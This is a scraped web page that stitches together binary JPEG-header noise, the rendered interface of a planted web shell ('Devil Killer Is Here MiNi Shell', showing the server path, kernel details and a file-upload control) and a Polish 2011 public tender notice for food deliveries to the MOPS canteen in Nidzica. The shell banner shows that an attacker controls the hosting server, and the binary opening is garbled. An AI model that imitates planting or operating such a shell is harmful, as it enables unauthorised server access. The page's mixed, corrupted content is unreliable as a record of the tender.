JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111027/281573-N-2011.html

<p class="kh_header"><b>Nidzica: Dostawa produktów żywnościowych do stołówki  MOPS.</b><br>
<b>Numer ogłoszenia: 281573 - 2011; data zamieszczenia: 27.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 5/7, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 089 6252914, faks 089 625 81 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://nidzica-mops.bip-wm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://nidzica-mops.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych do stołówki  MOPS..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
Zadanie Nr 1
Produkty zwierzęce, mięso i produkty mięsne
Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Schab bez kości, surowy 	kg	80
2	Kotlet hamburger	kg	50
3	Karkówka wieprzowa b/k, surowa 	kg	100
4	Pasztetowa
-w naturalnym flaku 	kg	120
5	Łopatka bez kości, surowa	kg	360
6	Żeberka surowe
Chude bez boczku 	kg	100
7	Boczek wędzony parzony zawartość mięsa min. 55-60%	kg	150
8	Baleron	kg	50
9	
Szynka surowa, bez kości	kg	140
10	Kiełbasa zwyczajna 
mięso wieprzowe (35-40%), mięso wołowe (25-30%), woda, kolagen, skrobia ziemniaczana, białko sojowe, sól, cukry, przeciwutleniacze: E300, E316, E301, stabilizator E451, aromaty i ekstrakty przypraw naturalnych, wzmacniacz smaku E621, konserwant E240, zawiera gluten 
	kg	400
11	Kiełbasa francuska 	kg	400
12	kiełbaski śląskie 	kg	400
13	Kiełbasa ogniskowa 	kg	400
14	Parówki wieprzowe w folii
 - mięso wieprzowe (65-70%), tłuszcz wieprzowy, tkanka łączna wieprzowa, skrobia ziemniaczana, sól, białko sojowe, błonnik pszenny, glukoza, przyprawy
 	kg	220
15	Kiełbasa biała	kg	200
16	Szynka wędzona	kg	50
17	Ogonówka	kg	50
18	Serdelki w osłonce 
-zawartość mięsa 65-70%	kg	180
19	Smalec(200g)	Szt.	600
20	Salceson
-w naturalnym flaku	Kg	110
21	Kaszanka jęczmienna 
kasza jęczmienna, krew, głowizna, sól, pieprz, podgardle, skórki, sadło, cebula	Kg	200
21	Kaszanka gryczana 
-  kasza gryczana, krew, głowizna, skórki, sadło, podgardle, wątroba wieprzowa, cebula, sól, pieprz	Kg 	150
23	Wątróbka wieprzowa, surowa 	kg	80
24	Wędlina
-mielonka 	kg	50

Zadanie nr 2 
Produkty drobiowe
Lp	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
2	Żołądki indycze 	kg	25
3	Udka z kurczaka	kg	500
4	Porcje rosołowe z kurczaka 
-ze skrzydełkami 	kg	850
Zadanie Nr 3
Różne produkty spożywcze
Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Cukier w oryginalnych opakowaniach 1kg
-biały	 Kg	250
2.		Cukier puder w opakowaniach 0,5kg
-biały mielony	Kg	6 
3.		Cukier waniliowy w opakowaniach 32 g	Szt.	60
4.		Kasza jęczmienna w oryginalnych opakowaniach 5kg
-drobna	Kg	140
5.		Kasza gryczana w oryginalnych opakowaniach 5 kg
-prażona	Kg	50
6.		Ryż biały długoziarnisty  w oryginalny opakowaniach 1 kg	Kg	190
7.		Mąka luksusowa w oryginalnych opakowaniach 1kg
-pszenna	Kg	400
8.		Mąka tortowa w oryginalnych opakowaniach 1 kg 
-pszenna	Kg 	100
9.		Mąka ziemniaczana w oryginalnych opakowaniach 1 kg 	Kg 	50
10.		Makaron nitki, kolanka,  łazanki, świderki, gwiazdki, spaghetti w oryginalnych opakowaniach 3 kg 	Kg	300
11.		Sól  kuchenna jodowana, biała drobna w oryginalnych opakowaniach 1kg	Kg	270
12.		Dżem niskosłodzony- różne smaki (300g)
-zawartość cukru 35-40 g na 100g produktu 
 -35-40 g owoców na 100 g prpduktu	Szt.	140
13.		Majeranek w oryginalnych opakowaniach  10g	Szt.	100
14.		Liść laurowy w oryginalnych opakowaniach 7 g	Szt.	100
15.		Pieprz ziołowy w oryginalnych opakowaniach  20g	Szt.	250
16.		Koperek suszony w oryginalnych opakowaniach  20g	Szt.	100
17.		Przyprawa do kurczaka w oryginalnych opakowaniach 20g	Szt.	50
18.		Pietruszka suszona w oryginalnych opakowaniach 10g	Szt.	100
19.		Papryka sypka w oryginalnych opakowaniach 20g	Szt.	100
20.		Ziele angielskie w oryginalnych opakowaniach 15g	Szt.	100
21.		Pieprz naturalny mielony w oryginalnych opakowaniach 20g	Szt.	250
22.		Przyprawa w  płynie  do zup, mięs, tatara, innych potraw 900 ml
-skład: woda, sól, substancja wzmacniające smak i zapach 	Szt.	40
23.		Wafel w polewie czekoladowej - kruchy wafelek z  kremem kakaowy od 48 do 50 %, czekolada 30-35 %            39g	Szt.	900
24.		Baton  czekoladowy z  nadzieniami: orzechowym, toffi, śmietankowym, waniliowym. Czekolada mleczna 50-60% 	Szt.	900
25.		Herbatniki  80 g	Szt.	900
26.		Biszkopty  w polewie czekoladowej z galaretką (147g)
-zawartość czekolady 10-15%
	Szt.	1000
27.		Konserwa turystyczna w oryginalnych opakowaniach (130g)	Szt.	900
28.		Gulasz angielski oryginalnych opakowaniach (130g)	Szt.	900
29.		Paprykarz  szczeciński oryginalnych opakowaniach (130g)	Szt.	900
30.		Tuńczyk w sosie własnym, konserwa 130g	Szt.	500
31.		Ryba w sosie pomidorowym, konserwa 130g	Szt.	500
32.		Mielonka, konserwa 130g	Szt.	50
33.		Oliwa z oliwek 1000ml
-otrzymana bezpośrednio z oliwek	Szt	10
34.		Ocet 10% 0,5l	Szt.	90
35.		Kwasek cytrynowy 20g	Szt.	70
36.		bułka tarta0,5kg	Szt.	160
37.		Koncentrat pomidorowy 900g)
-30%	Szt.	230
38.		Przyprawa warzywna w  proszku do potraw 1 kg ( 15-20% suszone warzywa - marchew, pasternak, cebula, seler, natka pietruszki. , np. Kucharek lub równoważne 	Szt.	90
39.		Olej 1L 
-100%	Szt.	150
40.		Herbata
-min 100 szt. w opakowaniu 	Szt.	15
41.		Ketchup pomidorowy w słoiku 815 g
-koncentrat pomidorowy 60-65 %	Szt.	30
42.		Napój w  proszku (koncentrat)1 kg - różne smaki	Szt.	150
43.		Sok marchwiowo bananowy zagęszczany  0,30l
-przeciery i soki 55-60%, z różnego rodzaju owoców i warzyw	Szt.	3000
44.		Sok Jabłkowy 1l
-bez dodatku cukru	Szt.	150
45.		Sok pomarańczowy 1l
-bez dodatku cukru	Szt.	       150
46.		Sok wieloowocowy 1l
Bez dodatku cukru	Szt.	150
47.		Soczek ze słomką 003l	Szt.	600
48.		Draże czekoladowe 70g	Szt.	150
49.		Kukurydza konserwowa 400g
-zawartość netto 400g
-po odlaniu zalewy 220 g	Szt.	100
50.		Pasztet  z kurcząt w  puszcze  130 g	Szt.	1000
51.		Majonez sałatkowy 850g słoik
-Olej roślinny rafinowany, musztarda (woda, ocet, gorczyca, cukier, sól, zioła), woda, żółtka jaj kurzych (7-8%)
-bez konserwantów	Szt.	25
52.		Musztarda300g )
-woda, gorczyca, ocet jabłkowy, cukier, sól, przyprawy, barwnik: kurkumina
	Szt.	20
53.		Ogórki konserwowe słoik 0,9
-ogórki, woda, ocet, cukier, sól, przyprawy (zawierają gorczycę)
	Szt.	200
54.		Sos grzybowy w proszku w  pudełku  1-1kg 
-bez konserwantów	Kg	20
55.		Sos pomidorowy 2000g pakowany  w  puszcze
-pomidory 75-80%
-koncentrat 18-20%
-olej rośliny, sól, cukier, cebula, suszona, kwasek cytrynowy 	Szt.	100
56.		Proszek do pieczenia 25g	Szt.	20
57.		Cukierki czekoladowe (mieszanki firmowe)	Kg 	50
58.		Czekolada pełnomleczna 100 g
-czekolada mleczna 50-55% (cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne w proszku, serwatka w proszku, tłuszcz mleczny) 
	Szt.	700
59.		Czekolada z nadzieniem owocowym 100g
-czekolada mleczna (cukier, tłuszcz kakaowy, miazga kakaowa, mleko pełne w proszku, tłuszcz mleczny, emulgatory: lecytyna sojowa, E476, aromat
-nadzienie owocowe-różne smaki 		700
60.		Lizak	Szt.	300
61.		Sok zagęszczony do rozcieńczania kompotu- różne smaki 500 ml 	Szt. 	160
62.		Szczaw słoik 350 g
-siekany	Szt.	350
63.		Zupka chińska z makaronem ( różne smaki) 50 g
	Szt.	500
64.		Zupa borowikowa w proszku 3kg
Wartość na 100g 
Energia kJ 1395-1400
Energia kcal 333-335 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 55-60 g 
	Szt.	20
65.		Zupa kalafiorowa w proszku 3 kg 
Wartość na 100g 
Energia kJ 1612-1615
Energia kcal 380-385 kcal
Tłuszcz 12-13 g
Białko 8-10 g
Węglowodany 60-62 g 
	Szt.	30
66.		Zup pieczarkowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1485-1450
Energia kcal 350 -355 kcal
Tłuszcz 10-12 g
Białko 8-10 g
Węglowodany 45-50g 
	Szt.	30
67.		Barszcz czerwony- zupa w proszku 3kg
Wartość na 100g 
Energia kJ 1410-1415
Energia kcal 333 -336 kcal
Tłuszcz 8-10 g
Białko 3-5 g
Węglowodany 50-55g 
	Szt.	35
68.		Barszcz biały - zupa w proszku 3 kg
Wartość na 100g 
Energia kJ 1394-1400
Energia kcal 330 -335 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 50-55g 
	Szt.	50
69.		Żurek- zupa w proszku 3 kg
Energia kJ 1270-1275
Energia kcal 300-305 kcal
Tłuszcz 7-10 g
Białko 10-12 g
Węglowodany 48-50g 
	Szt.	20
70.		Żurek -koncentrat w płynie 500ml	Szt. 	50
71.		Zupa ogonowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1300-1320
Energia kcal 314 -320 kcal
Tłuszcz 8-10 g
Białko 13-15 g
Węglowodany 35-40 g 
Wydajność ok. 25 l 	Szt.	15
72.		Zupa szparagowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1512-1515
Energia kcal 355 -360 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 55-60 g 
	Szt. 	20
73.		Zupa brokułowa w proszku 3 kg
Wartość na 100g 
Energia kJ 1395-1400
Energia kcal 333-335 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 60-63 g 
	Szt..	15
74.		Groszek konserwowy 400 g
-zawartość netto 400g
-po odlaniu zalewy 220 g	Szt.	120
75.		Fasola w  opakowaniach 5 kg
-drobna 	kg	150
76.		Fasola Jaś w opakowaniach 5 kg 	kg	50
77.		Groch łuskany połówki w opakowaniach  5 kg	kg	200
78.		Chrzan w słoiczku 300 g	Szt.	10
79.		Kakao 	Szt.	10
80.		Krem czekoladowy z orzechami laskowymi do smarowania pieczywa. Nie zawiera substancji konserwujących  i barwników. 250g	Szt.	50
81.		Rosół z kury 3 kg
Energia kJ 985-990
Energia kcal 240 -250 kcal
Tłuszcz 8-10 g
Białko 8-10 g
Węglowodany 31-33 g 
	Szt.	50
82.		Sos do spaghetti (bolognese, słodko kwaśny) w słoiku 800 g 		30
83.		Sos sałatkowy w proszku 9g
-różne smaki	Szt. 	50
84.		Barszcz czerwony- koncentrat w płynie 
-woda, zagęszczony sok z buraków ćwikłowych min 25 % , cukier, sól, ocet, kwas cytrynowy, regulator kwasowości, kwas askrobionowy, przeciwutleniacz 	Szt. 	30
Zadanie Nr 4
Ryby mrożone, filety rybne i pozostałe mięso z ryb                                                                                                    
Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Filet mrożony z pangi o zawartości glazury lodowej do 25%	kg	90
2	Filet z mintaja kostka o zawartości glazury lodowej do 25%	kg	60
3	Filet z miruny  o zawartości glazury lodowej do 25%	kg	50
4	Filety śledziowe małosolne	Kg	60
Zadanie nr 5
Warzywa mrożone 
Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Włoszczyzna  2.5 kg
-4 składnikowa	kg	800
2	Kalafior mrożony 2.5 kg	kg.	200
3	Brokuły             2.5 kg	kg	150
4	Zupa jarzynowa   2.5 kg
-7 składnikowa 
	kg	200
5	Marchew z groszkiem  2.5 kg	Kg	100
6	Marchew kostka 2,5 kg	Kg	100
7	Marchew juniorka 2,5  kg	kg	50
8	Fasola szparagowa 2,5 kg	Kg	120
Zadanie nr 6
Produkty głęboko mrożone
Lp.	Nazwa towaru	Jedn. miary	Max. Ilość
1	2	3	4
1	Frytki           2,5kg
-niekarbowane 	kg.	50
2	Kopytka  500g	Szt.	150
3	Pierogi z twarogiem  500g	Szt.	200
4	Pierogi ruskie 500g	szt	100
5	Pierogi z kapustą 500g	Szt.	150
6	Pierogi z miesem500g	Szt.	150
7	Pierogi z truskawkami 500g	Szt.	100
8	Pyzy z mięsem 500g	Szt.	280
9	Pyzy bez mięsa 500 g		100
10	Uszka  z mięsem oraz z  kapustą 500g	Szt.	 40
11	Pizza (z pieczarką lub szynką) mała	Szt.	125
12	Zapiekanka -mała	Szt.	125
Zadanie Nr 7
Produkty mleczarskie
Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Masło śmietankowe 200 g	Szt.	200
2.		Mleko 3,2 karton 1l	Szt.	400
3.		Śmietana 30% 0,5l karton 
	Szt.	1000
4.		Śmietana 12% kubek 200g	Szt.	300
5.		Jogurt owocowy z  kawałkami owoców ( 9% owoców)
150-g	Szt.	4000
6.		Jogurt owocowy bez kawałków owoców 150-g 	Szt.	2500
7.		Ser biały twarogowy półtusty	kg	100
8.		Ser twardy równoważnik gouda	kg	10
9.		Serek homogenizowany (waniliowy) 150 g	Szt.	2000
10.		Serek homogenizowany owocowy 140g 	Szt.	5500
11.		Serek homogenizowany czekoladowy 140g	Szt.	2000
12.		Deser z koroną - rózne smaki z bitą śmietaną 175g 	Szt.	1000
13.		Serek topiony  ( w prostokącie) (100 g)	Szt.	800
14.		Deser mleczny 
-z ryżem lub kaszą
-140 g	Szt.	1000
Zadanie Nr 8
Owoce, warzywa i podobne produkty
Lp. 	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Marchew 	kg	200
2.		Pietruszka 	kg	60
3.		Cebula 	kg	180
4.		Kapusta biała 	kg	300
5.		Kapusta młoda	Szt.	200
6.		Kapusta pekińska	Szt.	110
7.		Ogórki szklar 	kg	100
8.		Buraki	kg	400
9.		Pomidory szklar	kg	35
10.		Kalafior 	Szt.	100
11.		Papryka 	kg	25
12.		Pieczarki	kg	160
13.		Kapusta kiszona	kg	420
14.		Ogórki kwaszone	kg	220
15.		Truskawki świeże	kg	30
16.		Jabłka I gatunek 	kg	850
17.		Mandarynki	kg	150
18.		Cytryny	kg	8
19.		Seler 	kg	50
20.		Por 	Szt.	200
21.		Banan	kg	650
22.		Pomarańcza	kg	650
23.		Kiwi	Szt.	500
24.		Brzoskwinia	Kg 	100
25.		Nektarynka 	Kg 	100
26.		Morela 	kg	50
27.		Winogron 	kg	50
28.		Sałata zielona 	szt	60
29.		Jajko 	Szt.	5100
30.		Koper- pęczek	Szt.	60
31.		Czosnek 	Szt.	50
32.		Rzodkiewka	pęczek	80
Zadanie Nr 9
pieczywo, świeże wyroby piekarskie i ciastkarskie
Lp.	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1	Chleb baltonowski  krojony mieszany (500 g)	Szt.	6300
2	Chleb krojony graham(500g)	Szt.	100
3	Chleb razowy (500g)	Szt.	100
4	Bułki poznańska (0,08g)
	Szt.	5000
5	Pączki z nadzieniem( 0.08g)	Szt.	1200
6	Bułka z nadzieniem owocowym (0,08g)
	Szt.	1500
7	Bułka z pieczarka (0,80g)	Szt.	1600
8	Bułka z parówką (0,80g)	Szt.	1600
9	Ciasto drożdżowe	Kg	40
10	Tort 	Kg	20
11	Babka- różne smaki	Kg 	10
12	Sernik	kg	15
13	Rolada- różne smaki	Kg 	15
14	Makowiec 	Kg 	15
15	Ciasto z owocami	Kg 	15
Zadanie Nr 10
Ziemniaki 
Lp. 	Nazwa towaru	Jedn. miary	Max. ilość
1	2	3	4
1.		Ziemniaki	kg	9000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt. 7 Pzp przyjęto możliwość rozszerzenia przedmiotu zamówienia wymienionego w zamówieniu podstawowym. Zamówienie uzupełniające polegać będzie na powtórzeniu tego samego rodzaju zamówienia, w ramach, którego planuje się dokupienie artykułów spożywczych wskazanych w załączniku nr 1 do SIWZ i umowy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.15.00-0, 15.80.00.00-6, 15.22.00.00-6, 15.33.11.70-9, 15.89.60.00-5, 15.50.00.00-3, 15.30.00.00-1, 15.81.00.00-9, 15.31.00.00-4, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie doryczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (oświadczenie - załącznik nr 4 do SIWZ).
Zamawiający dokona w oparciu o dokumenty wyszczególnione w pkt. V niniejszej SIWZ według formularza spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie. tj. Wykonawca w ciągu ostatnich dwóch lat wykonał co najmniej 1 realizację, odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot (oświadczenie - załącznik nr 4 do SIWZ).
Zamawiający dokona w oparciu o dokumenty wyszczególnione w pkt. V niniejszej SIWZ według formularza spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. tj. dysponują co najmniej jednym środkiem transportu spełniającym warunki określone w rozporządzeniu ministra zdrowia z dnia 19 grudnia 2002roku w sprawie wymagań sanitarnych dot.: środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności (oświadczenie - załącznik nr 4 do SIWZ).
Zamawiający dokona w oparciu o dokumenty wyszczególnione w pkt. V niniejszej SIWZ według formularza spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia   (oświadczenie - załącznik nr 4 do SIWZ).
Zamawiający dokona w oparciu o dokumenty wyszczególnione w pkt. V niniejszej SIWZ według formularza spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

